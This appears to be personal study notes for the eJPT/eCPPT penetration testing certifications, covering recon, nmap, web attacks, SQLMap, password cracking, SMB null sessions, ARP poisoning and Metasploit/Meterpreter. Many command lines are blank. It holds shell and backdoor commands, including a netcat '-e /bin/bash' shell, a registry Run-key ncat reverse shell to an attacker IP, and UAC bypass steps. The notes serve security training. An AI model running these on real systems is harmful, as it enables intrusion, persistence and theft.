eJPT/eCPPT Notes

Methodology

Testing Checklist

• Refer to the OWASP Testing Checklist: Testing Checklist

Routing

Check Routes

• Command: route

Add Route

• Command: ip route add <network_ip>/<cidr> via <gateway_ip> dev <network_card_name>

Start Python Server

• Recommended to change into /tmp directory

• Command: python -m SimpleHTTPServer 8080

• Put things in the same directory to access them via a webpage

Web

Netcat

• Start a connection: nc -v hack.me 80

  • Make GET request:

  • Only works for HTTP

For HTTPS use OpenSSL

• Command: openssl s_client -connect hack.me:443

  • Use -debug, -state for more info

  • Use -quiet to remove connection info

Information Gathering

Open Source

• Crunchbase: IT startup database, information about founders, investors, employees, buyouts, acquisitions

• Whois Database: Owner name, address, email, technical contacts

Subdomain Enumeration

Passive Enumeration

• Google query: "site:company.com"

• Tools:

  • dnsdumpster.com

  • virustotal.com: Search cached DNS subdomains

  • crt.sh: Collect SSL certificates and valid domain names

  • Inspecting certificates on domains may lead to more subdomains

Tools for Subdomain Enumeration

• sublist3r:

  • Command: sublist3r -d google.com

  • Has brute force option that parses provided wordlist

• amass:

  • Install:

  • Example: snap run amass -ip -d google.com

Footprinting & Scanning

Mapping a Network

• fping performs a ping sweep on an IP range:

  • Commands:

• nmap can perform ping scans with the -sn flag:

  • Command:

OS Fingerprinting

• nmap can fingerprint OS with -O flag, use -Pn flag to skip ping:

  • Command: nmap -O -Pn <targets>

Port Scanning

• TCP Connect Scan:

  • SYN -> <- SYN + ACK

  • ACK -> RST + ACK (closes connection)

• Scanning Closed Port:

  • SYN -> <- RST + ACK (port is closed)

nmap Port Scanning

• Common Flags:

  • -sT: TCP connect scan

  • -sS: SYN scan

  • -sV: Version detection

  • -Pn: Skips ping sweep, useful if network has firewalls or blocks ICMP packets

Spotting Firewall

• Incomplete nmap results on well-known services like a web server:

  • Example: “http?” or “tcpwrapped” means remote host closed connection without receiving data

  • Use nmap --reason to get more information on why a port is open or closed

masscan

• Used for scanning large networks quickly, not as accurate as nmap:

  • Example:

Vulnerability Assessment

Nessus

• Popular vulnerability scanner, uses a client & server:

  • Starts with a ping sweep and port scan, then probes each daemon and cross-checks responses with a vulnerability database

  • Prone to false positives

Installing Nessus

• Command: dpkg -i nessus.deb

Usage

• Commands:

• Open web interface (may need to add security exception)

• Setup custom policy and scan using GUI, export results

Web Attacks

Web Server Fingerprinting

• Netcat:

  • Command: nc <target_ip> 80

  • After connecting, send a valid HTTP request:

  • Netcat only works on HTTP websites, for HTTPS use OpenSSL:

    • Command: openssl s_client -connect target.site:443

    • Example:

Automated Fingerprinting Tool httprint

• Example: httprint -P0 -h <target_ip> -s /usr/share/httprint/signatures.txt

• Flags:

  • -P0: Not ping web server

  • -h: Define host

  • -s: Define signature file

HTTP Verbs

• GET: Used to request resource

• POST: Used to submit HTML form data

• HEAD: Used to grab header

• PUT: Used to upload file to server

  • You must know the size of the file you are trying to upload

  • Example:

• DELETE: Used to remove file from server

• OPTIONS: Used to query web server for available HTTP verbs

Netcat

Setup nc Listener or Server

• Command: nc -lvp 8888

• Connect to nc listener: nc -v 127.0.0.1 8888

• To make connection UDP: Add -u

• Sending file over nc:

  • Command: cat tobesent.txt | nc -v 127.0.0.1 8888

• Reverse Shell:

  • Command: nc -lvp 1337 -e /bin/bash

Dirbuster / Dirb

Dirbuster

• GUI based directory enumerator

Dirb

• Command line based directory enumerator

Basic Usage

• Commands:

Common Flags

• -a: Change user agent to make request look like they come from a browser, useragentstring.com

• -c “COOKIE: XYZ”: Specifies cookie in request

• -u “admin:password”: User authentication in request

• -H “My Header: My content”: Add header into request

• -r: Turn off recursive search “sub directories”

• -z 1000: Changes speed to one request a second

• -s: Silent mode: only displays items that were found

• -X “.php,.bak”: Append extensions to word list

• -x extensions.txt: Include file with extensions

• -o results.txt: Saved results in output file

Run dirb through Proxy “Burp”

• Command: dirb http://google.com -p http://127.0.0.1:8080

MySQL

Login to MySQL Server

• Command:

  • -u for user

  • -p for password (no space)

Google Dorking

• site: Only include results from specified host

• intitle: Filters results based on title of page

• inurl: Text included in URL

• filetype: Used to search for specific file extensions .pdf, .xls

• AND, OR, &, |: Logical operators for queries

• -: Used to filter out words

Cross-Site Scripting (XSS)

Overview

• Occurs when web application uses unfiltered user input to build the output content displayed to its end users; this lets an attacker control the HTML and Javascript code, thus attacking the application user.

User Input

• Any parameter coming from client side of web app such as:

  • Request headers

  • Cookies

  • Form inputs

  • POST parameters

  • GET parameters

Payloads

• Alert that XSS is there:

• Steal cookies:

• Steal cookies and send them to attacker controlled site:

SQL

Example Query

• Command:

Web App Use

• In order for a web app to use database it must:

  • Connect to database

  • Submit query

  • Retrieve results before applications can use results

Example SQL Injection

• Command:

Finding Injection Points

• Test every supplied user input used by the web app:

  • GET parameters

  • POST parameters

  • HTTP headers:

    • User-Agent

    • Cookie

    • Accept

Input SQL Injection

• String terminators: ', "

• Commands: SELECT, UNION

• SQL Comments: #, --

SQL Functions

• Commands:

More Commands

• SELECT user(); // displays current database user

• select substring(user(), 1, 1) = 'r'; // returns a true or false (0 or 1), effective for learning more about what db contains

Union Based Injection

• Commands:

SQLMap

Overview

• Open source penetration testing tool that automates process of detecting SQL injection

• Capable of both detecting and exploiting

• Always recommended to test by hand first to avoid crashing DB

Basic Syntax

• Command:

Examples

• Command:

  • Test the id parameter of the GET request for view.php, tells sqlmap to use UNION based injection

• To test POST request:

• Command:

More SQLMap Syntax

• -v3: Displays queries used

• --users: Enumerate users

• --dns: See what dbs are connected

• -D dbname --tables: Specify db and enumerate tables

• -T specified table --columns: Grab columns from specified tables

• -C specify columns, column2 --dump: Dump records of specified columns

• --data='user=a&pass=a': POST injection, grab post info from burp-suite

Metasploit SQL Enumeration

• Use auxiliary/scanner/mssql/mssql_login

Backdoors

Hide ncat in Windows systems32 directory

Forward Shell

• On Windows machine:

• On attacker machine:

Reverse Shell

• On attacker machine:

• On Windows machine:

Persistent Backdoor

1. Start listener on attacker machine

2. Open regedit on Windows machine

3. Navigate to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

4. Right-click and add new string value, name ncat, edit string value and add path to ncat binary along with reverse shell syntax: "C:\Windows\System32\ncat.exe <attacker_ip> <port> -e cmd.exe"

5. Restart victim machine to activate shell

Password Attacks

JohnTheRipper

• After acquiring /etc/passwd (hashed passwords on Linux system) & /etc/shadow (users on Linux system), John needs user and pass to be in the same file:

  • Command:

  • Brute Force:

  • To display passwords recovered by John:

  • Cracked passwords stored in file

Dictionary Attack

• Command:

• Good wordlist to install:

Rainbow Tables

• Tables containing passwords that have been pre-hashed saving time and computational power.

• Ophcrack: Rainbow table password cracking tool

Authentication Cracking

Hydra

• Tools used for cracking network services such as HTTP, SSH, FTP, etc.

• Syntax:

Configuring Hydra

1. Inspect page source

2. Figure out how credentials are being sent to server (POST)

3. Figure out names of parameters being sent (pwd, usr)

• Example Webpage:

  • -L: List of user names

  • -P: List of passwords

  • -f: Hydra will stop after first credential found

  • -V: Verbosity

• Example SSH:

Windows Shares

UNC or Universal Naming Convention Paths

• \\servername\ShareName\file.net

Administrative Shares

• \\ComputerName\C$: Lets admin access volume on local machine

• \\ComputerName\admin$: Points to the Windows installation directory

• \\ComputerName\ipc$: Used for interprocess communication

Nul Sessions

• An anonymous connection to an inter-process communication network service on Windows-based computers:

  1. Check and see if the target has any file server enabled

  2. nbstat -A 10.123.162.2 or nbstat \? for help

  3. The third line down will tell you if the target is sharing any files in the <> field

  4. If file server is enabled, enumerate shares with NET VIEW

  5. NET VIEW <target_ip>

  6. Try to connect to share

  7. NET USE \\<target_ip>\IPC$ '' /u:'' (connect to the IPC$ share without authentication)

• enum:

  • Script that automates enumeration of shares

  • Commands:

• winfo:

  • Another enumeration tool

  • Command:

Linux Version

1. nmblookup -A <target_ip>

2. smbclient -L \\:<target_ip> -N

• Use instead: smbclient -L <WORKGROUP> -I <TARGET_IP> -N -U "" (allows you to see services on target, -N forces no password)

1. smbclient //<target_ip>/IPC$ -N

• Use instead: smbclient \\\\<target_ip>\\<target_share> -N (connects to IPC share without authentication)

Enumeration Scripts

• enum4linux script:

  • Enumerates shares

  • Brute force enumeration:

• samrdump.py:

  • Enumerates info about users using null sessions

  • Command:

• nmap smb enumeration:

  • Commands:

ARP Poisoning

• Works by changing the ARP caches on two network nodes. Attacker sends unsolicited ARP packets to the two nodes telling them to route traffic through the attacker computer.

Enable Packet Forwarding

• Command:

Dsniff

• Tool used for ARP poisoning:

  • Example:

    • -i: NIC

    • -t & -r: Victims

• You can then run Wireshark to see the traffic

Metasploit

Framework for Exploiting Machines

Requirements Before Use

• Commands:

Start

• Command: msfconsole

Help

• Command: show -h

Search

• Command: search <search_term>

Show All Exploits

• Command: show exploits

Use Exploit

• Command: use exploit/windows/ftp/turboftp_port

Go "Back"

• Command: back

Get Info About Exploit

• Command: info

See Exploit Options

• Command: options

Configure Exploit Parameters

• Command: set

See Available Payloads

• Command: show payloads

Set Payload

• Command:

Launch Exploit/Payload

• Command: exploit

Create Listener

• Commands:

Upgrade to Meterpreter

• Commands:

Scan for SMB Vulnerabilities with nmap

• Command:

Meterpreter

Advanced Shell

Search for Meterpreter Payloads

• Command: search meterpreter

Put Session in Background

• Command: background

List Current Sessions

• Command: sessions -l

Resume Session

• Command: sessions -i 1

Get Info About Machine

• Command: sysinfo

Network Info

• Command: ifconfig

Routing Tables

• Command: route

Get Current User ID

• Command: getuid

Elevate Privilege

• Command: getsystem

  • If operation fails, try the following:

    1. Background session

    2. Search bypassuac

    3. Use exploit /windows/local/bypassuac

    4. Set session

    5. Exploit

Uploading/Downloading Files

• Command: upload <path> or download <path>

Use Standard OS Shell

• Command: shell

See All Processes Running

• Command: ps

See Process Meterpreter is Attached to

• Command: getpid

Check UAC

• Command: run post/windows/gather/win_privs

Migrating Process to be Stealthy

• When migrating process, the new process must have the same level of privilege:

  • Command: ps -U SYSTEM

  • This command will search for all other processes with system-level privilege:

    • Command: migrate <pid>

Remote Code Execution (RCE)

Blind RCE

• Test bash sleep command to see if page is delayed:

  • Command: sleep 5

Testing Network Connectivity

• Use Wireshark to pick up ICMP packets:

  • Command: ping <attacker> -c 5

  • May need to use URL encoding to keep syntax intact

Testing Webshell

Get Paths to Installed Programs

• Command: echo $PATH

Look for Specific Tools

• Command: which <tool>

Curl

See if You Can Establish TCP Connection

• On Attacker:

  • Setup listener with nc: nc -lvp 53

• On Target:

  • Establish TCP with curl: curl http://<attacker_ip>:<attacker_port>

Test Commands with Curl

• Commands:

Test Commands with Spaces in the Output with Curl

• Commands:

  • Command above will not display properly because there are spaces in the output, need to encode to see full output:

    • Command:

  • To decode:

    • Command:

Downloading Files with Curl

• Command:

Uploading Files

1. Start simple Python HTTP server:

• Command:

• All files in directory you start Python server in will be available via server

1. Generate payload & store it in server directory:

• Command:

1. Get payload on victim machine:

• Command:

1. Test if file was uploaded by downloading it:

• Command:

1. Running payload:

• Command:

1. Spawning a Better Shell:

• Command:

• Spawns bash environment

• There are lots of shells you can easily spawn, look them up “spawning tty shell”:

  • Command:

Pivoting with Meterpreter

• Command: